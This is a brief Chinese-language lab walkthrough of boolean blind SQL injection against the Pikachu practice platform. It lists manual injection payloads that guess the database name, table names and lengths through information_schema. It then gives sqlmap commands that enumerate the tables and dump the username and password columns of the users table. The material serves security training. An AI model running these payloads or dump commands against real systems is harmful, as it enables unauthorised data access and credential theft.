pikachu SQL 注入(盲注)
SQL盲注
1.判断是否存在注入点
kobe and 1=1# 正常返回结果
kobe and 1=2# 返回空结果
2
2.猜测数据库长度(burp探测)
kobe and length(database())>=k #
数据库的长度为7
2. 猜测数据库名
kobe and (select substr(database(),1,1))=k#
得到数据库名为pikachu
3.盲注表名猜测
kobe and length((select group_concat(table_name) from information_schema.tables where table_schema = pikachu )) = 1 # 猜测结果长度
长度是38
如图的到表长度为38
kobe and substr((select group_concat(table_name) from information_schema.tables where table_schema = pikachu ),1,1) = a # 单字符猜测结果
得到表名httpinfo,member,message,users,xssblind
4.盲注列名猜解,和猜解表名一个方法
得到长度为26
5.使用sqlmap自动探测和数据挖掘,注意,使用的IP地址不能是127.0.0.1
1. 探测目标是否存在注入漏洞
sqlmap -r 111.txt --technique=B --string="您查询的数据存在”
探测到布尔型漏洞
2.获取数据库名称
3. 获取pikachu数据库表信息
sqlmap -r 111.txt -D pikachu –tables
4. 获取users表的列信息
sqlmap -r 111.txt -D pikachu -T users –columns
5. 获取users表数据
sqlmap -r 111.txt -D pikachu -T users -C username,password –dump